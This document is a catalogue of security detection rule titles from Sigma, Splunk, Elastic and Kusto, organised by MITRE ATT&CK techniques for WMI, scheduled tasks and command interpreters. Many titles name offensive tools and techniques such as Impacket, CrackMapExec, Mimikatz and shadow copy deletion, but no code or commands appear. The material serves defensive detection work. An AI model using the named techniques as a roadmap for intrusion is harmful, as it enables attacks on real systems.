- Elastic Execution of File Written or Modified by Microsoft Office production
- Elastic File with Suspicious Extension Downloaded production
- Kusto Office ASR rule triggered from browser spawned office process. available
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Remote File Execution via MSIEXEC production
- Splunk Process Creating LNK file in Suspicious Location production
- Elastic Remote XSL Script Execution via COM production
- Elastic Suspicious Explorer Child Process production
- Elastic Suspicious HTML File Creation production
- Kusto Suspicious parentprocess relationship - Office child processes. available
- Kusto T1566.002 Spearphishing Link - Rare URL Clicks
- Elastic Unusual Execution via Microsoft Common Console File production
- Splunk Windows Defender ASR Audit Events production
- Splunk Windows Defender ASR Block Events production
- Splunk Windows Defender ASR Rules Stacking production
Execution
Windows Management Instrumentation T1047 108 rules
- Sigma Application Removed Via Wmic.EXE test
- Sigma Application Terminated Via Wmic.EXE test
- Sigma Blue Mockingbird test
- Sigma Blue Mockingbird - Registry test
- Sigma Computer System Reconnaissance Via Wmic.EXE test
- Elastic Delayed Execution via Ping production
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Potential Impacket Lateral Movement Activity stable
- Sigma Hardware Model Reconnaissance Via Wmic.EXE test
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- YARA-L Impacket WMIExec CISA Report
- Sigma Impacket WMIexec process execution experimental
- Splunk Impacket_Empire's WMIExec (Windows Event Log)
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Mofcomp Activity production
- Sigma New Process Created Via Wmic.EXE test
- Sigma Password Set to Never Expire via WMI experimental
- Elastic Persistence via WMI Event Subscription production
- Elastic Persistence via WMI Standard Registry Provider production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential Maze Ransomware Activity test
- Sigma Potential Product Class Reconnaissance Via Wmic.EXE test
- Sigma Potential Product Reconnaissance Via Wmic.EXE test
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Potential Unquoted Service Path Reconnaissance Via Wmic.EXE test
- Sigma Potential Windows Defender Tampering Via Wmic.EXE test
- Sigma Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell stable
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerShell Invoke CIMMethod CIMSession production
- Splunk PowerShell Invoke WmiExec Usage production
- Splunk Process Execution via WMI production
- Sigma Process Reconnaissance Via Wmic.EXE test
- Sigma PSExec and WMI Process Creations Block test
- Sigma RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class experimental
- Sigma Registry Manipulation via WMI Stdregprov experimental
- Splunk Remote Process Instantiation via WMI production
- Splunk Remote Process Instantiation via WMI and PowerShell production
- Splunk Remote Process Instantiation via WMI and PowerShell Script Block production
- Splunk Remote WMI Command Attempt production
- Splunk Remote WMIC Query (PowerShell)
- Splunk Remote WMIC Query (Windows Event Log)
- Sigma Script Event Consumer Spawning Process test
- Splunk Script Execution via WMI production
- Elastic Security Software Discovery using WMIC production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service Reconnaissance Via Wmic.EXE test
- Sigma Service Started/Stopped Via Wmic.EXE test
- Sigma Service Startup Type Change Via Wmic.EXE experimental
- Sigma Successful Account Login Via WMI stable
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Elastic Suspicious Cmd Execution via WMI production
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Elastic Suspicious Execution from a Mounted Device production
- Sigma Suspicious HH.EXE Execution test
- Sigma Suspicious Microsoft Office Child Process test
- Sigma Suspicious Process Created Via Wmic.EXE test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious WMIC Execution Via Office Process test
- Elastic Suspicious WMIC XSL Script Execution production
- Sigma Suspicious WmiPrvSE Child Process test
- Sigma System Disk And Volume Reconnaissance Via Wmic.EXE test
- Splunk System Enumeration with WMIC (Sysmon)
- Splunk System Enumeration with WMIC (Windows Event Log)
- Sigma T1047 Wmiprvse Wbemcomn DLL Hijack test
- Sigma UNC2452 PowerShell Pattern test
- Elastic Volume Shadow Copy Deletion via PowerShell production
- Elastic Volume Shadow Copy Deletion via WMIC production
- Sigma Windows Hotfix Updates Reconnaissance Via Wmic.EXE test
- Elastic Windows Script Interpreter Executing Process via WMI production
- Elastic Windows System Information Discovery production
- Splunk Windows WinRAR Launched Outside Default Installation Directory production
- Splunk Windows WMI Impersonate Token production
- Splunk Windows WMI Process And Service List production
- Splunk Windows WMI Process Call Create production
- Splunk Windows WMI Reconnaissance Class Query production
- Splunk WinRM Tools (PowerShell)
- Splunk WinRM Tools (Sysmon)
- Splunk WinRM Tools (Windows Event Log)
- Sigma WMI Event Consumer Created Named Pipe test
- Elastic WMI Incoming Lateral Movement production
- Sigma WMI Module Loaded By Uncommon Process test
- Sigma WMI spwaning PowerShell process - WMImplant experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
- Elastic WMI WBEMTEST Utility Execution production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
- Splunk WMIC Host Reconniassance (PowerShell)
- Splunk WMIC Host Reconniassance (Sysmon)
- Splunk WMIC Host Reconniassance (Windows Event Log)
- Elastic WMIC Remote Command production
- Sigma WMIC Remote Command Execution test
- Sigma WMIC Unquoted Services Path Lookup - PowerShell test
- Sigma Wmiexec Default Output File test
- Sigma WMImplant Hack Tool test
- Splunk Wmiprvse LOLBAS Execution Process Spawn production
- Sigma WmiPrvSE Spawned A Process stable
- Splunk WmiPrvSE Suspicious Child Process (Sysmon)
- Splunk WmiPrvSE Suspicious Child Process (Windows Event Log)
- Sigma Wmiprvse Wbemcomn DLL Hijack test
- Sigma Wmiprvse Wbemcomn DLL Hijack - File test
- Sigma XSL Script Execution Via WMIC.EXE test
Scheduled Task/Job T1053 133 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Kusto AV detections related to Tarrask malware available
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Defrag Deactivation - Security test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - SharPersist Execution test
- Sigma HAFNIUM Exchange Exploitation Activity test
- Splunk Hidden Scheduled Task Created - Windows (Windows Event Log)
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive AT Job test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Splunk Schedule Task with HTTP Command Arguments production
- Splunk Schedule Task with Rundll32 Command Trigger production
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (PowerShell)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Sysmon)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Windows Event Log)
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Elastic Scheduled Tasks AT Command Enabled production
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks Run Task On Demand production
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Scheduled Task Write to System32 Tasks test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows Hidden Schedule Task Settings production
- Splunk Windows Level RMM Watchdog Task Created production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task DLL Module Loaded production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Scheduled Tasks for CompMgmtLauncher or Eventvwr production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Scheduled Task/Job: At T1053.002 5 rules
- Elastic At.exe Command Lateral Movement production
- Sigma Interactive AT Job test
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Elastic Scheduled Tasks AT Command Enabled production
Scheduled Task/Job: Scheduled Task T1053.005 111 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Command and Scripting Interpreter T1059 732 rules
- Splunk 1 or 2 Character Executable (Windows Event Log)
- Sigma Abusable DLL Potential Sideloading From Suspicious Location test
- Sigma Add Insecure Download Source To Winget test
- Sigma Add New Download Source To Winget test
- Sigma Add Potential Suspicious New Download Source To Winget test
- Sigma Adwind RAT / JRAT test
- Sigma Adwind RAT / JRAT File Artifact test
- Sigma Alternate PowerShell Hosts - PowerShell Module test
- Sigma Alternate PowerShell Hosts Pipe test
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Atlassian Confluence CVE-2022-26134 test
- Sigma Atomic MacOS Stealer - FileGrabber Activity experimental
- Elastic Attempt to Install or Run Kali Linux via WSL production
- Splunk AutoHotkey Execution (PowerShell)
- Splunk AutoHotkey Execution (Sysmon)
- Splunk AutoHotkey Execution (Windows Event Log)
- Splunk AutoIt Execution (PowerShell)
- Splunk AutoIt Execution (Sysmon)
- Splunk AutoIt Execution (Windows Event Log)
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Sigma Bad Opsec Powershell Code Artifacts test
- Sigma Base64 Encoded PowerShell Command Detected test
- YARA-L Base64 Encoded PowerShell Command Detected
- Kusto Base64 encoded Windows process command-lines available
- Kusto Base64 encoded Windows process command-lines (Normalized Process Events)
- Elastic Binary Content Copy via Cmd.exe production
- Sigma BloodHound Collection Files test
- Sigma bXOR Operator Usage In PowerShell Command Line - PowerShell Classic test
- Splunk Bypass or Unrestricted PowerShell Execution (PowerShell)
- Sigma Certificate Exported Via PowerShell test
- Sigma Change PowerShell Policies to an Insecure Level test
- Sigma Change PowerShell Policies to an Insecure Level - PowerShell test
- Sigma ChromeLoader Malware Execution test
- Elastic Clearing Windows Console History production
- Sigma Clfs.SYS Loaded By Process Located In a Potential Suspicious Location experimental
- Splunk CMD Carry Out String Command Parameter production
- Splunk CMD Echo Pipe - Escalation production
- Splunk CMD execution with _c (PowerShell)
- Splunk CMD execution with _c (Sysmon)
- Splunk CMD execution with _c (Windows Event Log)
- Sigma Cmd.EXE Missing Space Characters Execution Anomaly test
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Elastic Command Execution via SolarWinds Process production
- Splunk Command Line .cmd Execution (Sysmon)
- Splunk Command Line .cmd Execution (Windows Event Log)
- Sigma Command Line Execution with Suspicious URL and AppData Strings test
- Splunk Command Line Spawned by Archive Utility - Windows (Sysmon)
- Splunk Command Line Spawned by Archive Utility - Windows (Windows Event Log)
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Splunk Command Output Redirected to Localhost (Windows Event Log)
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Command-Line Interface Execution (PowerShell)
- Splunk Command-Line Interface Execution (Sysmon)
- Splunk Command-Line Interface Execution (Windows Event Log)
- Splunk Common Exchange Recon cmdlets (PowerShell)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Elastic Conhost Spawned By Suspicious Parent Process production
- Sigma Conhost Spawned By Uncommon Parent Process test
- Sigma Conhost.exe CommandLine Path Traversal test
- Splunk Conhost.exe Kernel call (Sysmon)
- Splunk Conhost.exe Kernel call (Windows Event Log)
- Splunk Consent.exe Suspicious Child Process (Sysmon)
- Splunk Consent.exe Suspicious Child Process (Windows Event Log)
- Sigma ConvertTo-SecureString Cmdlet Usage Via CommandLine test
- YARA-L ConvertTo-SecureString Cmdlet Usage Via CommandLine
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Cscript/Wscript Uncommon Script Extension Execution test
- Sigma CVE-2022-24527 Microsoft Connected Cache LPE test
- Sigma CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) test
- Sigma CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) test
- Sigma DarkGate - Autoit3.EXE Execution Parameters test
- Sigma DarkGate - Autoit3.EXE File Creation By Uncommon Process test
- Sigma DarkGate - Drop DarkGate Loader In C:\Temp Directory test
- Kusto Deimos Component Execution available
- Elastic Delayed Execution via Ping production
- Splunk Detect Certify With PowerShell Script Block Logging production
- Splunk Detect Empire with PowerShell Script Block Logging production
- Splunk Detect Mimikatz With PowerShell Script Block Logging production
- Splunk Detect Prohibited Applications Spawning cmd exe production
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Splunk Detect Use of cmd exe to Launch Script Interpreters production
- Sigma Detection of PowerShell Execution via Sqlps.exe test
- Elastic Disabling Windows Defender Security Settings via PowerShell production
- Sigma DNS Query by Finger Utility experimental
- Kusto Doppelpaymer Stop Services available
- Sigma DSInternals Suspicious PowerShell Cmdlets test
- Sigma DSInternals Suspicious PowerShell Cmdlets - ScriptBlock test
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Sigma Elevated System Shell Spawned test
- Sigma Elevated System Shell Spawned From Uncommon Parent Location test
- Sigma Elise Backdoor Activity test
- Sigma Emotet Loader Execution Via .LNK File test
- Splunk Encoded Powershell Command (PowerShell)
- Splunk Encoded Powershell Command (Sysmon)
- Splunk Encoded Powershell Command (Windows Event Log)
- Sigma Encoded PowerShell payload deployed (PowerShell) experimental
- Sigma Encoded PowerShell payload deployed via process execution experimental
- Splunk Excessive distinct processes from Windows Temp production
- Splunk Excessive number of taskhost processes production
- Splunk Exchange PowerShell Module Usage production
- Sigma Exchange PowerShell Snap-Ins Usage test
- Kusto Exchange Worker Process Making Remote Call
- Splunk Executable Create Script Process (PowerShell)
- Splunk Executable Create Script Process (Sysmon)
- Splunk Executable Create Script Process (Windows Event Log)
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Sigma Execute Code with Pester.bat test
- Sigma Execute Code with Pester.bat as Parent test
- Splunk Execute Javascript With Jscript COM CLSID production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of Persistent Suspicious Program production
- Sigma Execution of Powershell Script in Public Folder test
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Elastic Execution via Windows Subsystem for Linux production
- Sigma Exploited CVE-2020-10189 Zoho ManageEngine test
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Splunk Explorer Child Process with Suspicious Command Line Padding (Sysmon)
- Elastic Exporting Exchange Mailbox via PowerShell production
- Sigma FakeUpdates/SocGholish Activity test
- Sigma Forfiles Command Execution test
- Splunk Get-ForestTrust with PowerShell Script Block production
- Splunk GetLocalUser with PowerShell Script Block production
- Splunk GetWmiObject User Account with PowerShell Script Block production
- Splunk Git Hooks Spawn System32 Process (Sysmon)
- Splunk Git Spawns System32 Process (Sysmon)
- Splunk Git Spawns System32 Process (Windows Event Log)
- Splunk Go Run Execution (PowerShell)
- Splunk Go Run Execution (Sysmon)
- Splunk Go Run Execution (Windows Event Log)
- Kusto Google Threat Intelligence - Threat Hunting Hash
- Sigma Greenbug Espionage Group Indicators test
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - Covenant PowerShell Launcher test
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - CrackMapExec PowerShell Obfuscation test
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - Empire PowerShell Launch Parameters test
- YARA-L Hacktool - IronSharpPack Execution
- Sigma HackTool - Jlaive In-Memory Assembly Execution test
- Sigma HackTool - Koadic Execution test
- Sigma HackTool - NetExec File Indicators experimental
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma HackTool - Sliver C2 Implant Activity Pattern test
- Sigma HackTool - Stracciatella Execution test
- Sigma Hacktool Ruler test
- Sigma Headless Process Launched Via Conhost.EXE test
- Sigma Hidden Powershell in Link File Pattern test
- Splunk High Entropy Powershell (PowerShell)
- Elastic Host File System Changes via Windows Subsystem for Linux production
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Splunk Impacket SMBexec (Windows Event Log)
- Splunk Impacket_Empire's WMIExec (Windows Event Log)
- Sigma Import PowerShell Modules From Suspicious Directories test
- Sigma Import PowerShell Modules From Suspicious Directories - ProcCreation test
- Elastic Incoming Execution via PowerShell Remoting production
- Sigma Install New Package Via Winget Local Manifest test
- Sigma Installation of WSL Kali-Linux experimental
- Sigma Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Splunk Invoke-Expression Command (PowerShell)
- Splunk Invoke-Expression Command (Sysmon)
- Splunk Invoke-Expression Command (Windows Event Log)
- Sigma Invoke-Obfuscation CLIP+ Launcher test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation CLIP+ Launcher - Security test
- Sigma Invoke-Obfuscation CLIP+ Launcher - System test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - Security test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - System test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - Security test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - System test
- Sigma Invoke-Obfuscation STDIN+ Launcher test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Powershell test
- Sigma Invoke-Obfuscation STDIN+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Security test
- Sigma Invoke-Obfuscation STDIN+ Launcher - System test
